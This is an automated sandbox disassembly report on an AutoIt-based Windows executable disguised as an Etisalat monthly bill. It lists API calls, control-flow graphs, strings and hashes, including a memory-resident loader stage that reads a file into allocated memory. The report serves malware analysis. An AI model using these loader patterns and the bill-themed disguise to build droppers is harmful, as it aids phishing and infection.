                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                      • API String ID: 4003667617-3242690629
                                      • Opcode ID: fe009cb491159c69ef751713c5536171955471ceec7fc10aeb6c460e730e5ab6
                                      • Instruction ID: b493770f81cfdf250a4f95016dbd7f310f11204553803dc733e6f521a55bc826
                                      • Opcode Fuzzy Hash: fe009cb491159c69ef751713c5536171955471ceec7fc10aeb6c460e730e5ab6
                                      • Instruction Fuzzy Hash: FDB2CE70608741DFD734DF24C884BAAB7E4FF85304F14899EE49A972A1CB74E985CB92

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00BC91E9: __time64.LIBCMT ref: 00BC91F3
                                        • Part of subcall function 00B65045: _fseek.LIBCMT ref: 00B6505D
                                      • __wsplitpath.LIBCMT ref: 00BC94BE
                                        • Part of subcall function 00B8432E: __wsplitpath_helper.LIBCMT ref: 00B8436E
                                      • _wcscpy.LIBCMT ref: 00BC94D1
                                      • _wcscat.LIBCMT ref: 00BC94E4
                                      • __wsplitpath.LIBCMT ref: 00BC9509
                                      • _wcscat.LIBCMT ref: 00BC951F
                                      • _wcscat.LIBCMT ref: 00BC9532
                                        • Part of subcall function 00BC922F: _memmove.LIBCMT ref: 00BC9268
                                        • Part of subcall function 00BC922F: _memmove.LIBCMT ref: 00BC9277
                                      • _wcscmp.LIBCMT ref: 00BC9479
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AAE
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AC1
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BC96DC
                                      • _wcsncpy.LIBCMT ref: 00BC974F
                                      • DeleteFileW.KERNEL32(?,?), ref: 00BC9785
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BC979B
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BC97AC
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BC97BE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 1500180987-0
                                      • Opcode ID: 596eded978d0c27772571fb95c1ced0fab2da0e2f35313aa7cc6aad33e825fa2
                                      • Instruction ID: 3bc422be91ee5cd50c347475d079e69b2ae004dbd3cd9148837e25a625e6b5c7
                                      • Opcode Fuzzy Hash: 596eded978d0c27772571fb95c1ced0fab2da0e2f35313aa7cc6aad33e825fa2
                                      • Instruction Fuzzy Hash: 55C118B1D00229AADF21DFA4CC85EDEB7BDEF45300F0040EAF609E6251DB749A848F65

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00B63074
                                      • RegisterClassExW.USER32(00000030), ref: 00B6309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B630AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00B630CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B630DC
                                      • LoadIconW.USER32(000000A9), ref: 00B630F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B63101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 595c001da610243cfd8cc88a57219db1fa586467325a1f29ceb7ff9f2b05bc2a
                                      • Instruction ID: c82d34bfe5b76a3784a2ea8af515898fd5afa52e26cef805d4cf7a00dc76f119
                                      • Opcode Fuzzy Hash: 595c001da610243cfd8cc88a57219db1fa586467325a1f29ceb7ff9f2b05bc2a
                                      • Instruction Fuzzy Hash: 643136B191038AEFDB10DFA4E888B9DBBF0FB08310F10452EE580EA2A0D7B94581CF51

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00B63074
                                      • RegisterClassExW.USER32(00000030), ref: 00B6309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B630AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00B630CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B630DC
                                      • LoadIconW.USER32(000000A9), ref: 00B630F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B63101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 7669a30c70c9e3c515f1a35fb65b81fff8c373d272b4a497716c218187f6444c
                                      • Instruction ID: 44c9a2a45a10e7f8fba54917cf818c99ca0e5dbfb4c41ae6f3fa0a4fe257435e
                                      • Opcode Fuzzy Hash: 7669a30c70c9e3c515f1a35fb65b81fff8c373d272b4a497716c218187f6444c
                                      • Instruction Fuzzy Hash: 1521C7B1911259EFDB10DFA4EC89BADBBF4FB08700F00812AF510AB2A0DBB545458FA1

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00B64864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C262F8,?,00B637C0,?), ref: 00B64882
                                        • Part of subcall function 00B8074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B672C5), ref: 00B80771
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B67308
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B9ECF1
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B9ED32
                                      • RegCloseKey.ADVAPI32(?), ref: 00B9ED70
                                      • _wcscat.LIBCMT ref: 00B9EDC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 2673923337-2727554177
                                      • Opcode ID: 4acd1eb8d03002584916fe804e44465c4ef2dbfa80db902f6a3949a5248f34dd
                                      • Instruction ID: 8569697909ca1716aaa7977380e22120ce1129e3ea784337345b3e1b4d16c6f5
                                      • Opcode Fuzzy Hash: 4acd1eb8d03002584916fe804e44465c4ef2dbfa80db902f6a3949a5248f34dd
                                      • Instruction Fuzzy Hash: F6715971419301DAC724EF25EC81AAFBBE8FF58740F440A6EF455871A1EB309949CB62

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00B63A62
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00B63A71
                                      • LoadIconW.USER32(00000063), ref: 00B63A88
                                      • LoadIconW.USER32(000000A4), ref: 00B63A9A
                                      • LoadIconW.USER32(000000A2), ref: 00B63AAC
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B63AD2
                                      • RegisterClassExW.USER32(?), ref: 00B63B28
                                        • Part of subcall function 00B63041: GetSysColorBrush.USER32(0000000F), ref: 00B63074
                                        • Part of subcall function 00B63041: RegisterClassExW.USER32(00000030), ref: 00B6309E
                                        • Part of subcall function 00B63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B630AF
                                        • Part of subcall function 00B63041: InitCommonControlsEx.COMCTL32(?), ref: 00B630CC
                                        • Part of subcall function 00B63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B630DC
                                        • Part of subcall function 00B63041: LoadIconW.USER32(000000A9), ref: 00B630F2
                                        • Part of subcall function 00B63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B63101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: a1266557a3f52bcb47935a13d314be6815c8e08c5f5369f47d92897adb5bb3b6
                                      • Instruction ID: dbb4a27bf7c6a871ae94339f69a70c0dc757cc87b178feee1d4ef207f82905fb
                                      • Opcode Fuzzy Hash: a1266557a3f52bcb47935a13d314be6815c8e08c5f5369f47d92897adb5bb3b6
                                      • Instruction Fuzzy Hash: B8216D71D10304EFEB219FA4EC49BAD7BF4FB08714F004169F504A72A0C7B95A558F60

                                      Control-flow Graph

                                      control_flow_graph 767 b63633-b63681 769 b63683-b63686 767->769 770 b636e1-b636e3 767->770 772 b636e7 769->772 773 b63688-b6368f 769->773 770->769 771 b636e5 770->771 774 b636ca-b636d2 DefWindowProcW 771->774 775 b9d31c-b9d34a call b711d0 call b711f3 772->775 776 b636ed-b636f0 772->776 777 b63695-b6369a 773->777 778 b6375d-b63765 PostQuitMessage 773->778 779 b636d8-b636de 774->779 810 b9d34f-b9d356 775->810 781 b63715-b6373c SetTimer RegisterWindowMessageW 776->781 782 b636f2-b636f3 776->782 783 b9d38f-b9d3a3 call bc2a16 777->783 784 b636a0-b636a2 777->784 780 b63711-b63713 778->780 780->779 781->780 788 b6373e-b63749 CreatePopupMenu 781->788 786 b9d2bf-b9d2c2 782->786 787 b636f9-b6370c KillTimer call b644cb call b63114 782->787 783->780 801 b9d3a9 783->801 789 b63767-b63776 call b64531 784->789 790 b636a8-b636ad 784->790 795 b9d2f8-b9d317 MoveWindow 786->795 796 b9d2c4-b9d2c6 786->796 787->780 788->780 789->780 798 b636b3-b636b8 790->798 799 b9d374-b9d37b 790->799 795->780 804 b9d2c8-b9d2cb 796->804 805 b9d2e7-b9d2f3 SetFocus 796->805 808 b636be-b636c4 798->808 809 b6374b-b6375b call b645df 798->809 799->774 807 b9d381-b9d38a call bb817e 799->807 801->774 804->808 811 b9d2d1-b9d2e2 call b711d0 804->811 805->780 807->774 808->774 808->810 809->780 810->774 816 b9d35c-b9d36f call b644cb call b643db 810->816 811->780 816->774
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00B636D2
                                      • KillTimer.USER32(?,00000001), ref: 00B636FC
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B6371F
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B6372A
                                      • CreatePopupMenu.USER32 ref: 00B6373E
                                      • PostQuitMessage.USER32(00000000), ref: 00B6375F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: e10c93713803a7193a2fabbdd2e3442d76ae687c04cff581c82e9d2fb0cbf92f
                                      • Instruction ID: c03b541fc08311b1ccd75fb416f740cb25ae4a5075026a7e0d141785262849e3
                                      • Opcode Fuzzy Hash: e10c93713803a7193a2fabbdd2e3442d76ae687c04cff581c82e9d2fb0cbf92f
                                      • Instruction Fuzzy Hash: C84106F2218145BBDF249F28EC89F7E37D5EB10B00F1801A9F502966A1DE789E519771

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                      • API String ID: 1825951767-3513169116
                                      • Opcode ID: 2a608ce82df77d8878214f823c9bd720e4f23d4a8bd41b44b35f9df900e8cfd3
                                      • Instruction ID: b402a197037b569b2405f30d305d83fdab8387c855d831594f6c082fbcbf4d3d
                                      • Opcode Fuzzy Hash: 2a608ce82df77d8878214f823c9bd720e4f23d4a8bd41b44b35f9df900e8cfd3
                                      • Instruction Fuzzy Hash: 6AA15F728102699ACF14EBA0CC95EEEB7F8BF14700F1405AAF416B7191DF799A09CB60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 942 15e2650-15e26fe call 15e0000 945 15e2705-15e272b call 15e3560 CreateFileW 942->945 948 15e272d 945->948 949 15e2732-15e2742 945->949 950 15e287d-15e2881 948->950 956 15e2749-15e2763 VirtualAlloc 949->956 957 15e2744 949->957 951 15e28c3-15e28c6 950->951 952 15e2883-15e2887 950->952 958 15e28c9-15e28d0 951->958 954 15e2889-15e288c 952->954 955 15e2893-15e2897 952->955 954->955 959 15e2899-15e28a3 955->959 960 15e28a7-15e28ab 955->960 961 15e276a-15e2781 ReadFile 956->961 962 15e2765 956->962 957->950 963 15e2925-15e293a 958->963 964 15e28d2-15e28dd 958->964 959->960 967 15e28ad-15e28b7 960->967 968 15e28bb 960->968 969 15e2788-15e27c8 VirtualAlloc 961->969 970 15e2783 961->970 962->950 965 15e293c-15e2947 VirtualFree 963->965 966 15e294a-15e2952 963->966 971 15e28df 964->971 972 15e28e1-15e28ed 964->972 965->966 967->968 968->951 975 15e27cf-15e27ea call 15e37b0 969->975 976 15e27ca 969->976 970->950 971->963 973 15e28ef-15e28ff 972->973 974 15e2901-15e290d 972->974 978 15e2923 973->978 979 15e290f-15e2918 974->979 980 15e291a-15e2920 974->980 982 15e27f5-15e27ff 975->982 976->950 978->958 979->978 980->978 983 15e2832-15e2846 call 15e35c0 982->983 984 15e2801-15e2830 call 15e37b0 982->984 990 15e284a-15e284e 983->990 991 15e2848 983->991 984->982 992 15e285a-15e285e 990->992 993 15e2850-15e2854 FindCloseChangeNotification 990->993 991->950 994 15e286e-15e2877 992->994 995 15e2860-15e286b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015E2721
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015E2947
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                      • Instruction ID: 6d8ad34abde1c6dc3ecdc0a3ed143cfbb3546061e2fd60b614b55249d7ed46c4
                                      • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                      • Instruction Fuzzy Hash: ADA12B74E04209EBDB18CFA4C898BEEBBB9FF48304F208559E505BB284D7759A81CF54

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1073 b639e7-b63a57 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B63A15
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63A36
                                      • ShowWindow.USER32(00000000,?,?), ref: 00B63A4A
                                      • ShowWindow.USER32(00000000,?,?), ref: 00B63A53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: e112e3b8f9996657a70364920a791193a9b0987d5ba540ea0a4aea49cbe6892b
                                      • Instruction ID: f01443024eb0e35c4200747ab58523e1f390b0a14160af914223ba89daa19541
                                      • Opcode Fuzzy Hash: e112e3b8f9996657a70364920a791193a9b0987d5ba540ea0a4aea49cbe6892b
                                      • Instruction Fuzzy Hash: C5F03A71610290FEEA311B236C48F3B2E7DD7C6F50B01002AB900A6170C6B50C42CAB0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1074 15e2410-15e2547 call 15e0000 call 15e2300 CreateFileW 1081 15e254e-15e255e 1074->1081 1082 15e2549 1074->1082 1085 15e2565-15e257f VirtualAlloc 1081->1085 1086 15e2560 1081->1086 1083 15e25fe-15e2603 1082->1083 1087 15e2583-15e259a ReadFile 1085->1087 1088 15e2581 1085->1088 1086->1083 1089 15e259e-15e25d8 call 15e2340 call 15e1300 1087->1089 1090 15e259c 1087->1090 1088->1083 1095 15e25da-15e25ef call 15e2390 1089->1095 1096 15e25f4-15e25fc ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                      APIs
                                        • Part of subcall function 015E2300: Sleep.KERNELBASE(000001F4), ref: 015E2311
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015E253D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: VOGW08WITY
                                      • API String ID: 2694422964-3814410972
                                      • Opcode ID: ee391977bb2ea0fd8ef1eace58d1b6c297a9d4712b1af7c3c43f3b86ad31ccde
                                      • Instruction ID: ff021cfab1abcc741e04b3848ffabfdb6dd2509b46fed4871e0a302326f35304
                                      • Opcode Fuzzy Hash: ee391977bb2ea0fd8ef1eace58d1b6c297a9d4712b1af7c3c43f3b86ad31ccde
                                      • Instruction Fuzzy Hash: BF519030D04249EBEF14DBE4D959BEEBBB9AF48300F104599E609BB2C0D7791B44CBA5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1098 b6410d-b64123 1099 b64200-b64204 1098->1099 1100 b64129-b6413e call b67b76 1098->1100 1103 b64144-b64164 call b67d2c 1100->1103 1104 b9d5dd-b9d5ec LoadStringW 1100->1104 1107 b9d5f7-b9d60f call b67c8e call b67143 1103->1107 1108 b6416a-b6416e 1103->1108 1104->1107 1116 b6417e-b641fb call b83020 call b6463e call b82ffc Shell_NotifyIconW call b65a64 1107->1116 1120 b9d615-b9d633 call b67e0b call b67143 call b67e0b 1107->1120 1111 b64174-b64179 call b67c8e 1108->1111 1112 b64205-b6420e call b681a7 1108->1112 1111->1116 1112->1116 1116->1099 1120->1116
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B9D5EC
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • _memset.LIBCMT ref: 00B6418D
                                      • _wcscpy.LIBCMT ref: 00B641E1
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B641F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                      • String ID: Line:
                                      • API String ID: 3942752672-1585850449
                                      • Opcode ID: 8888d0a2f0655b8fd39b016d96282e7e332cb0f4a12611587d3b384a361f2e48
                                      • Instruction ID: 7990d38d54f6edd94527f9174dc72219a4e71528cc3a2e54140f7775608f4939
                                      • Opcode Fuzzy Hash: 8888d0a2f0655b8fd39b016d96282e7e332cb0f4a12611587d3b384a361f2e48
                                      • Instruction Fuzzy Hash: 2A31F471008304AAD731EB60DC86FDF77ECAF45304F1049AEF185920A1EF78AA49C7A2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1133 b8564d-b85666 1134 b85668-b8566d 1133->1134 1135 b85683 1133->1135 1134->1135 1136 b8566f-b85671 1134->1136 1137 b85685-b8568b 1135->1137 1138 b8568c-b85691 1136->1138 1139 b85673-b85678 call b88d68 1136->1139 1140 b8569f-b856a3 1138->1140 1141 b85693-b8569d 1138->1141 1151 b8567e call b88ff6 1139->1151 1144 b856b3-b856b5 1140->1144 1145 b856a5-b856b0 call b83020 1140->1145 1141->1140 1143 b856c3-b856d2 1141->1143 1149 b856d9 1143->1149 1150 b856d4-b856d7 1143->1150 1144->1139 1148 b856b7-b856c1 1144->1148 1145->1144 1148->1139 1148->1143 1153 b856de-b856e3 1149->1153 1150->1153 1151->1135 1155 b856e9-b856f0 1153->1155 1156 b857cc-b857cf 1153->1156 1157 b85731-b85733 1155->1157 1158 b856f2-b856fa 1155->1158 1156->1137 1159 b8579d-b8579e call b90df7 1157->1159 1160 b85735-b85737 1157->1160 1158->1157 1161 b856fc 1158->1161 1168 b857a3-b857a7 1159->1168 1163 b85739-b85741 1160->1163 1164 b8575b-b85766 1160->1164 1165 b857fa 1161->1165 1166 b85702-b85704 1161->1166 1169 b85751-b85755 1163->1169 1170 b85743-b8574f 1163->1170 1171 b85768 1164->1171 1172 b8576a-b8576d 1164->1172 1167 b857fe-b85807 1165->1167 1173 b8570b-b85710 1166->1173 1174 b85706-b85708 1166->1174 1167->1137 1168->1167 1177 b857a9-b857ae 1168->1177 1178 b85757-b85759 1169->1178 1170->1178 1171->1172 1175 b857d4-b857d8 1172->1175 1179 b8576f-b8577b call b84916 call b910ab 1172->1179 1173->1175 1176 b85716-b8572f call b90f18 1173->1176 1174->1173 1182 b857ea-b857f5 call b88d68 1175->1182 1183 b857da-b857e7 call b83020 1175->1183 1192 b85792-b8579b 1176->1192 1177->1175 1181 b857b0-b857c1 1177->1181 1178->1172 1194 b85780-b85785 1179->1194 1187 b857c4-b857c6 1181->1187 1182->1151 1183->1182 1187->1155 1187->1156 1192->1187 1195 b8578b-b8578e 1194->1195 1196 b8580c-b85810 1194->1196 1195->1165 1197 b85790 1195->1197 1196->1167 1197->1192
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
